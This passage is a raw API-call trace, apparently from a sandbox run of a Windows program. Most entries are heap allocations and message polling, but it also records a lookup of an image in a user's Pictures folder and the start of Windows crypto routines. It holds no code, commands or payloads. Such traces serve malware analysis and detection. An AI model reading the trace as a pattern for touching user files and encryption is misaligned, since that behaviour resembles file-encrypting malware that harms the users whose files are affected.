Flags=0x0, Size=0x10) returned 0x2e50ff8 [0253.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0253.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0253.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0253.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0253.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0253.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0253.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0253.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0253.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0253.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0253.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0253.395] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0253.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0253.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0253.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0253.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0253.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0253.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0253.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0253.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0253.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0253.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0253.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0253.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0253.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0253.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0253.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0253.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0253.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0253.395] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0253.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0253.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0253.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0253.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0253.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0253.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0253.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0253.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0253.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0253.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0253.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0253.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0253.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0253.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0253.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0253.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0253.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0253.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0253.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0253.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0253.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0253.396] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures/T9bmRc0wgjLMG_.jpg", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2355fcc0, ftCreationTime.dwHighDateTime=0x1d5f052, ftLastAccessTime.dwLowDateTime=0x691d95a0, ftLastAccessTime.dwHighDateTime=0x1d5eedc, ftLastWriteTime.dwLowDateTime=0x691d95a0, ftLastWriteTime.dwHighDateTime=0x1d5eedc, nFileSizeHigh=0x0, nFileSizeLow=0x577, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="T9bmRc0wgjLMG_.jpg", cAlternateFileName="T9BMRC~1.JPG")) returned 0xa87490 [0253.397] FindClose (in: hFindFile=0xa87490 | out: hFindFile=0xa87490) returned 1 [0253.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0253.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0253.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0253.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0253.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0253.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0253.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0253.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0253.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0253.397] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0253.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0253.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0253.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0253.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0253.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0253.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0253.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0253.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0253.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0253.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0253.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0253.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0253.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0253.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0253.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0253.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0253.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0253.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0253.398] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0253.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0253.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0253.398] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0253.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0253.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0253.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51358 [0253.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0253.399] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0253.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0253.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ff0 [0253.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0253.399] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0253.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ff0 | out: hHeap=0x970000) returned 1 [0253.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0253.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51490 [0253.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0253.399] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0253.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0253.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0253.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0253.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0253.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0253.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0253.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0253.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0253.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0253.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0253.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0253.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77788 [0253.400] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0253.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0253.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0253.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0253.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0253.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0253.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0253.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0253.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0253.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0253.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0253.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0253.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0253.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0253.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0253.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0253.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0253.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0253.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0253.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0253.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0253.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0253.401] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0253.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0253.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0253.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0253.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0253.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0253.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0253.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0253.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0253.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0253.402] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0253.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0253.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0253.402] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0253.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d50 [0253.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0253.402] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0253.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d50 | out: hHeap=0x970000) returned 1 [0253.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0253.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0253.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c18 [0253.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0253.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0253.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0253.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0253.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51598 [0253.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0253.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0253.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0253.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0253.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0253.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0253.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0253.403] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0253.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0253.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0253.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0253.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0253.403] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0253.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0253.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0253.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0253.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0253.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0253.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0253.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0253.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0253.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0253.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0253.404] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0253.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0253.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0253.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0253.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0253.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0253.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0253.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0253.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0253.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0253.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0253.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0253.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0253.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0253.405] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0253.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0253.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0253.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0253.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0253.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0253.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0253.405] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0253.405] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0253.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0253.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0253.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0253.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0253.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0253.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0253.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0253.406] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0253.406] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0253.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55e30 | out: hHeap=0x970000) returned 1 [0253.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0253.406] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0253.406] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0253.406] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0253.406] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e69b28, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0253.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517d8 | out: hHeap=0x970000) returned 1 [0253.406] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0253.407] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e69b88, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0253.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0253.407] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0253.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0253.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0253.408] RtlAllocateHeap 